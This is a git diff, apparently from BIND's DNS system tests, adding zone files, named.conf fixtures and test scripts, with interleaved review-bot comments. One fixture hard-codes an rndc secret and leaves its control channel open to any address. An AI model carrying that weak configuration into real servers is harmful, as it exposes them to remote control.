ns1. +naptr2.example. NS ns1. +nid.example. NS ns1. diff --git a/bin/tests/system/additional/ns1/rt.db b/bin/tests/system/additional/ns1/rt.db new file mode 100644 index 0000000..c858f0d --- /dev/null +++ b/bin/tests/system/additional/ns1/rt.db 
@@ -0,0 +1,21 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 + NS ns1.rt2.example. +ns1 A 10.53.0.1 + +rt RT 2 www +www AAAA 192::99 +www A 192.168.2.99 +www X25 100099 diff --git a/bin/tests/system/additional/ns1/rt2.db b/bin/tests/system/additional/ns1/rt2.db new file mode 100644 index 0000000..b61a198 --- /dev/null +++ b/bin/tests/system/additional/ns1/rt2.db @@ -0,0 +1,20 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 86400 +@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D ); + NS ns1 +ns1 A 10.53.0.1 + +rt RT 2 www.hang3b.zone. +server SRV 0 0 5061 server +server A 192.168.2.9 +server AAAA 192::9 diff --git a/bin/tests/system/additional/ns1/srv.db b/bin/tests/system/additional/ns1/srv.db new file mode 100644 index 0000000..0aee21a --- /dev/null +++ b/bin/tests/system/additional/ns1/srv.db 
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 86400
+@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D );
+ NS ns1
+ns1 A 10.53.0.1
+_xmpp-client._tcp SRV 1 0 5222 server
+server A 1.2.3.4
+_5222._tcp.server TLSA 3 0 1 5B30F9602297D558EB719162C225088184FAA32CA45E1ED15DE58A21 D9FCE383
diff --git a/bin/tests/system/additional/ns2/named.conf.in b/bin/tests/system/additional/ns2/named.conf.in
new file mode 100644
index 0000000..dae255d
--- /dev/null
+++ b/bin/tests/system/additional/ns2/named.conf.in
@@ -0,0 +1,30 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.2;
+ notify-source 10.53.0.2;
+ transfer-source 10.53.0.2;
+ recursion no;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.2; };
+ listen-on-v6 { none; };
+ notify no;
+ minimal-responses yes;
+};
+
+zone "." {
+ type primary;
+ file "root.db";
+};
diff --git a/bin/tests/system/additional/ns2/root.db b/bin/tests/system/additional/ns2/root.db
new file mode 100644
index 0000000..728bdde
--- /dev/null
+++ b/bin/tests/system/additional/ns2/root.db
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. IN SOA ns2. hostmaster ( 2 8H 2H 4W 1D);
+. NS ns2.
+ns1. A 10.53.0.1
+ns2. A 10.53.0.2
+rt.example. NS ns1.
+naptr.example. NS ns1.
+rt2.example. NS ns1.
+naptr2.example. NS ns1.
+nid.example. NS ns1.
+
diff --git a/bin/tests/system/additional/ns3/ex.db b/bin/tests/system/additional/ns3/ex.db
new file mode 100644
index 0000000..c893a84
--- /dev/null
+++ b/bin/tests/system/additional/ns3/ex.db
@@ -0,0 +1,16 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 86400
+@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D );
+ NS ns1
+ NS ns1.ex2.
+ns1 A 10.53.0.1
diff --git a/bin/tests/system/additional/ns3/ex2.db b/bin/tests/system/additional/ns3/ex2.db
new file mode 100644
index 0000000..f9039cf
--- /dev/null
+++ b/bin/tests/system/additional/ns3/ex2.db
@@ -0,0 +1,15 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 86400
+@ IN SOA ns1 hostmaster ( 2 8H 2H 4W 1D );
+ NS ns1
+ns1 A 10.53.0.1
diff --git a/bin/tests/system/additional/ns3/named.conf.in b/bin/tests/system/additional/ns3/named.conf.in
new file mode 100644
index 0000000..2bd01c9
--- /dev/null
+++ b/bin/tests/system/additional/ns3/named.conf.in
@@ -0,0 +1,42 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+controls { /* empty */ };
+
+options {
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ recursion yes;
+ dnssec-validation yes;
+ minimal-responses no;
+};
+
+zone "." {
+ type hint;
+ file "root.hint";
+};
+
+zone "ex" {
+ type primary;
+ file "ex.db";
+};
+
+zone "ex2" {
+ type primary;
+ file "ex2.db";
+};
diff --git a/bin/tests/system/additional/ns3/root.hint b/bin/tests/system/additional/ns3/root.hint
new file mode 100644
index 0000000..ef6ee6f
--- /dev/null
+++ b/bin/tests/system/additional/ns3/root.hint
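Review bot: `dnssec-validation yes;` in the ns3 `options` block is set without any `trust-anchors` statement in this file, and with that combination named validates nothing, so a reader can take this resolver for a validating one when it is not. If the setting is only there to keep named from loading its built-in root key against the fake root at 10.53.0.2 (an inference, the hunk does not say), a comment should state it: `/* no trust anchor configured, so nothing is validated; "yes" rather than "auto" keeps the built-in root key out */`. If validation is meant to be exercised by this test, the anchor has to be added here.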
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. NS ns2.
+ns2. A 10.53.0.2
diff --git a/bin/tests/system/additional/setup.sh b/bin/tests/system/additional/setup.sh
new file mode 100644
index 0000000..62fe66a
--- /dev/null
+++ b/bin/tests/system/additional/setup.sh
@@ -0,0 +1,20 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+copy_setports ns1/named1.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
diff --git a/bin/tests/system/additional/tests.sh b/bin/tests/system/additional/tests.sh
new file mode 100644
index 0000000..fbb9ce0
--- /dev/null
+++ b/bin/tests/system/additional/tests.sh
@@ -0,0 +1,378 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT}" +RNDCCMD="$RNDC -c $SYSTEMTESTTOP/common/rndc.conf -p ${CONTROLPORT} -s" + +status=0 +n=0 + +dotests() { + n=`expr $n + 1` + echo_i "test with RT, single zone (+rec) ($n)" + ret=0 + $DIG $DIGOPTS +rec -t RT rt.rt.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with RT, two zones (+rec) ($n)" + ret=0 + $DIG $DIGOPTS +rec -t RT rt.rt2.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NAPTR, single zone (+rec) ($n)" + ret=0 + $DIG $DIGOPTS +rec -t NAPTR nap.naptr.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NAPTR, two zones (+rec) ($n)" + ret=0 + $DIG $DIGOPTS +rec -t NAPTR nap.hang3b.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with LP (+rec) ($n)" + ret=0 + $DIG $DIGOPTS +rec -t LP nid2.nid.example @10.53.0.1 > dig.out.$n || ret=1 + case $minimal in + no) + grep -w "NS" dig.out.$n > /dev/null || ret=1 + grep -w "L64" dig.out.$n > /dev/null || ret=1 + grep -w "L32" dig.out.$n > /dev/null || ret=1 + ;; + yes) + grep -w "NS" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 
+ ;; + no-auth) + grep -w "NS" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null || ret=1 + grep -w "L32" dig.out.$n > /dev/null || ret=1 + ;; + no-auth-recursive) + grep -w "NS" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null || ret=1 + grep -w "L32" dig.out.$n > /dev/null || ret=1 + ;; + esac + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NID (+rec) ($n)" + ret=0 + $DIG $DIGOPTS +rec -t NID ns1.nid.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $minimal = no ] ; then + # change && to || when we support NID additional processing + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + else + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + fi + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NID + LP (+rec) ($n)" + ret=0 + $DIG $DIGOPTS +rec -t NID nid2.nid.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $minimal = no ] ; then + # change && to || when we support NID additional processing + grep -w "LP" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + else + grep -w "LP" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + fi + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with RT, single zone (+norec) ($n)" + ret=0 + $DIG $DIGOPTS +norec -t RT rt.rt.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with RT, two zones (+norec) ($n)" + ret=0 + $DIG $DIGOPTS +norec -t RT rt.rt2.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n 
+ 1` + echo_i "test with NAPTR, single zone (+norec) ($n)" + ret=0 + $DIG $DIGOPTS +norec -t NAPTR nap.naptr.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NAPTR, two zones (+norec) ($n)" + ret=0 + $DIG $DIGOPTS +norec -t NAPTR nap.hang3b.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with LP (+norec) ($n)" + ret=0 + $DIG $DIGOPTS +norec -t LP nid2.nid.example @10.53.0.1 > dig.out.$n || ret=1 + case $minimal in + no) + grep -w "NS" dig.out.$n > /dev/null || ret=1 + grep -w "L64" dig.out.$n > /dev/null || ret=1 + grep -w "L32" dig.out.$n > /dev/null || ret=1 + ;; + yes) + grep -w "NS" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + ;; + no-auth) + grep -w "NS" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null || ret=1 + grep -w "L32" dig.out.$n > /dev/null || ret=1 + ;; + no-auth-recursive) + grep -w "NS" dig.out.$n > /dev/null || ret=1 + grep -w "L64" dig.out.$n > /dev/null || ret=1 + grep -w "L32" dig.out.$n > /dev/null || ret=1 + ;; + esac + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NID (+norec) ($n)" + ret=0 + $DIG $DIGOPTS +norec -t NID ns1.nid.example @10.53.0.1 > dig.out.$n || ret=1 + if [ $minimal = no ] ; then + # change && to || when we support NID additional processing + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + else + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + fi + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NID + LP (+norec) ($n)" + ret=0 + $DIG $DIGOPTS +norec -t NID nid2.nid.example @10.53.0.1 > dig.out.$n || 
ret=1 + if [ $minimal = no ] ; then + # change && to || when we support NID additional processing + grep -w "LP" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + else + grep -w "LP" dig.out.$n > /dev/null && ret=1 + grep -w "L64" dig.out.$n > /dev/null && ret=1 + grep -w "L32" dig.out.$n > /dev/null && ret=1 + fi + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NS, root zone ($n)" + ret=0 + $DIG $DIGOPTS -t NS . @10.53.0.1 > dig.out.$n || ret=1 + # Always expect glue for root priming queries, regardless $minimal + grep 'ADDITIONAL: 3' dig.out.$n > /dev/null || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi + + n=`expr $n + 1` + echo_i "test with NS, non-root zone ($n)" + ret=0 + $DIG $DIGOPTS -t NS rt.example @10.53.0.1 > dig.out.$n || ret=1 + case $minimal in + yes) + grep 'ADDITIONAL: 2' dig.out.$n > /dev/null || ret=1 + ;; + no) + grep 'ADDITIONAL: 2' dig.out.$n > /dev/null || ret=1 + ;; + no-auth) + grep 'ADDITIONAL: 2' dig.out.$n > /dev/null || ret=1 + ;; + no-auth-recursive) + grep 'ADDITIONAL: 2' dig.out.$n > /dev/null || ret=1 + ;; + esac + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) + fi +} + +echo_i "testing with 'minimal-responses yes;'" +minimal=yes +dotests + +echo_i "reconfiguring server: minimal-responses no" +copy_setports ns1/named2.conf.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 + +echo_i "testing with 'minimal-responses no;'" +minimal=no +dotests + +n=`expr $n + 1` +echo_i "testing with 'minimal-any no;' ($n)" +ret=0 +$DIG $DIGOPTS -t ANY www.rt.example @10.53.0.1 > dig.out.$n || ret=1 +grep "ANSWER: 3, AUTHORITY: 2, ADDITIONAL: 2" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +echo_i "reconfiguring server: minimal-any yes" +copy_setports ns1/named3.conf.in ns1/named.conf +rndc_reconfig ns1 
10.53.0.1 + +n=`expr $n + 1` +echo_i "testing with 'minimal-any yes;' over UDP ($n)" +ret=0 +$DIG $DIGOPTS -t ANY +notcp www.rt.example @10.53.0.1 > dig.out.$n || ret=1 +grep "ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi +n=`expr $n + 1` + +echo_i "testing with 'minimal-any yes;' over TCP ($n)" +ret=0 +$DIG $DIGOPTS -t ANY +tcp www.rt.example @10.53.0.1 > dig.out.$n || ret=1 +grep "ANSWER: 3, AUTHORITY: 0, ADDITIONAL: 1" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +n=`expr $n + 1` +echo_i "testing with 'minimal-any yes;' over UDP ($n)" +ret=0 +$DIG $DIGOPTS -t ANY +notcp www.rt.example @10.53.0.1 > dig.out.$n || ret=1 +grep "ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +echo_i "testing with 'minimal-responses no-auth;'" +minimal=no-auth +dotests + +echo_i "reconfiguring server: minimal-responses no-auth-recursive" +copy_setports ns1/named4.conf.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 + +echo_i "testing with 'minimal-responses no-auth-recursive;'" +minimal=no-auth-recursive +dotests + +n=`expr $n + 1` +echo_i "testing returning TLSA records with MX query ($n)" +ret=0 +$DIG $DIGOPTS -t mx mx.example @10.53.0.1 > dig.out.$n || ret=1 +grep "mx\.example\..*MX.0 mail\.mx\.example" dig.out.$n > /dev/null || ret=1 +grep "mail\.mx\.example\..*A.1\.2\.3\.4" dig.out.$n > /dev/null || ret=1 +grep "_25\._tcp\.mail\.mx\.example\..*TLSA.3 0 1 5B30F9602297D558EB719162C225088184FAA32CA45E1ED15DE58A21 D9FCE383" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +n=`expr $n + 1` +echo_i "testing returning TLSA records with SRV query ($n)" +ret=0 +$DIG $DIGOPTS -t srv _xmpp-client._tcp.srv.example @10.53.0.1 > dig.out.$n || ret=1 +grep 
"_xmpp-client\._tcp\.srv\.example\..*SRV.1 0 5222 server\.srv\.example" dig.out.$n > /dev/null || ret=1 +grep "server\.srv\.example\..*A.1\.2\.3\.4" dig.out.$n > /dev/null || ret=1 +grep "_5222\._tcp\.server\.srv\.example\..*TLSA.3 0 1 5B30F9602297D558EB719162C225088184FAA32CA45E1ED15DE58A21 D9FCE383" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +echo_i "reconfiguring server: minimal-responses no" +copy_setports ns1/named2.conf.in ns1/named.conf +rndc_reconfig ns1 10.53.0.1 + +n=`expr $n + 1` +echo_i "testing NS handling in ANY responses (authoritative) ($n)" +ret=0 +$DIG $DIGOPTS -t ANY rt.example @10.53.0.1 > dig.out.$n || ret=1 +grep "AUTHORITY: 0" dig.out.$n > /dev/null || ret=1 +grep "NS[ ]*ns" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +n=`expr $n + 1` +echo_i "testing NS handling in ANY responses (recursive) ($n)" +ret=0 +$DIG $DIGOPTS -t ANY rt.example @10.53.0.3 > dig.out.$n || ret=1 +grep "AUTHORITY: 0" dig.out.$n > /dev/null || ret=1 +grep "NS[ ]*ns" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +n=`expr $n + 1` +echo_i "testing out-of-zone additional data from auth zones (authoritative) ($n)" +ret=0 +$DIG $DIGOPTS -t NS rt.example @10.53.0.1 > dig.out.$n || ret=1 +grep "ADDITIONAL: 2" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +n=`expr $n + 1` +echo_i "testing out-of-zone additional data from auth zones (recursive) ($n)" +ret=0 +$DIG $DIGOPTS -t NS ex @10.53.0.3 > dig.out.$n || ret=1 +grep "ADDITIONAL: 3" dig.out.$n > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=$((status+1)) +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/addzone/clean.sh b/bin/tests/system/addzone/clean.sh new file mode 100644 index 0000000..5e94b5c --- /dev/null 
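Review bot: The `case $minimal in` blocks in `dotests` (the LP checks and the NS non-root check) have no default arm, so a misspelled or unset mode skips every grep and the check counts as passed. Adding `*) echo_i "unknown minimal mode: $minimal"; ret=1 ;;` to each makes that case fail, and the `[ $minimal = no ]` tests should quote the variable as `[ "$minimal" = no ]` for the same reason. The NS non-root `case` has four identical arms with no comment, unlike the NID checks where the inline comment explains the duplication; either collapse it to a single grep or say why the arms are kept apart. The label "testing with 'minimal-any yes;' over UDP" is used for two separate checks, which makes a failure ambiguous in the log.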
+++ b/bin/tests/system/addzone/clean.sh
@@ -0,0 +1,44 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f ./dig.out.*
+rm -f ./rndc.out*
+rm -f ./showzone.out*
+rm -f ./zonestatus.out*
+rm -f ./*/named.conf
+rm -f ./*/named.memstats
+rm -f ./ns1/*.nzf ./ns1/*.nzf~
+rm -f ./ns1/*.nzd ./ns1/*.nzd-lock
+rm -f ./ns2/*.nzf ./ns2/*.nzf~
+rm -f ./ns2/*.nzd ./ns2/*.nzd-lock
+rm -f ./ns3/*.nzf ./ns3/*.nzf~
+rm -f ./ns3/*.nzd ./ns3/*.nzd-lock
+rm -f ./ns2/core*
+rm -f ./ns2/inline.db.jbk
+rm -f ./ns2/inline.db.signed
+rm -f ./ns2/inlinesec.bk*
+rm -rf ./ns2/new-zones
+rm -f ./ns*/named.lock
+rm -f ./ns*/named.run ./ns*/named.run.prev
+rm -f ./ns2/nzf-*
+rm -f ./ns3/named.conf
+rm -f ./ns3/*.nzf ./ns3/*.nzf~
+rm -f ./ns3/*.nzd ns3/*.nzd-lock
+rm -f ./ns3/inlinesec.db
+rm -f ./ns1/redirect.db
+rm -f ./ns2/redirect.db
+rm -f ./ns2/redirect.bk
+rm -f ./ns3/redirect.db
+rm -f ./ns*/managed-keys.bind* ns*/*.mkeys*
+rm -f ./nzd2nzf.out.*
+rm -f ./wait_for_message.*
diff --git a/bin/tests/system/addzone/ns1/inlinesec.db b/bin/tests/system/addzone/ns1/inlinesec.db
new file mode 100644
index 0000000..eb9d042
--- /dev/null
+++ b/bin/tests/system/addzone/ns1/inlinesec.db
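Review bot: Several removals in this list are repeated: the ns3 `.nzf` and `.nzd` lines each appear twice, and `rm -f ./ns3/named.conf` is already covered by `rm -f ./*/named.conf`. The second ns3 `.nzd` line and `ns*/*.mkeys*` also drop the `./` prefix that every other path in the file carries. All paths are relative to the working directory and one line is `rm -rf ./ns2/new-zones`, so a header comment such as `# run from the addzone test directory; all paths are relative to it` would record the assumption; the additional/setup.sh in this commit calls `$SHELL clean.sh` with no `cd`.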
@@ -0,0 +1,26 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$ORIGIN inlinesec.example.
+$TTL 300 ; 5 minutes
+@ IN SOA mname1. . (
+ 1 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns2
+ns2 A 10.53.0.2
+ MX 10 mail
+
+a A 10.0.0.1
+mail A 10.0.0.2
diff --git a/bin/tests/system/addzone/ns1/named.conf.in b/bin/tests/system/addzone/ns1/named.conf.in
new file mode 100644
index 0000000..afd7c31
--- /dev/null
+++ b/bin/tests/system/addzone/ns1/named.conf.in
@@ -0,0 +1,46 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+options {
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ allow-query { any; };
+ allow-new-zones yes;
+ recursion no;
+};
+
+zone "." {
+ type hint;
+ file "../../common/root.hint";
+};
+
+zone "inlinesec.example" {
+ type primary;
+ file "inlinesec.db";
+};
+
+zone "." {
+ type redirect;
+ file "redirect.db";
+};
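Review bot: The `key rndc_key` block hard-codes the control-channel secret in this file, while the ns2 and ns3 configs later in the commit bring the same key name in with `include "../../common/rndc.key";`, so the credential is kept in two places that can drift apart. Replacing the inline block with that `include` line leaves one copy, assuming common/rndc.key (not shown here) carries the same secret and algorithm. The `controls` statement here, like the ones in ns2/named1.conf.in, ns2/named2.conf.in, ns2/named3.conf.in and ns3/named1.conf.in, accepts connections from `any`, which leaves that static key as the only gate on a server that also sets `allow-new-zones yes;`. A comment such as `/* system-test fixture: fixed key and open control channel, not for deployment */` would mark that as deliberate.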
diff --git a/bin/tests/system/addzone/ns1/redirect.db.1 b/bin/tests/system/addzone/ns1/redirect.db.1
new file mode 100644
index 0000000..5dcdd1b
--- /dev/null
+++ b/bin/tests/system/addzone/ns1/redirect.db.1
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 0 SOA . . 0 0 0 0 0
+@ 0 NS .
diff --git a/bin/tests/system/addzone/ns1/redirect.db.2 b/bin/tests/system/addzone/ns1/redirect.db.2
new file mode 100644
index 0000000..4dcbdbc
--- /dev/null
+++ b/bin/tests/system/addzone/ns1/redirect.db.2
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
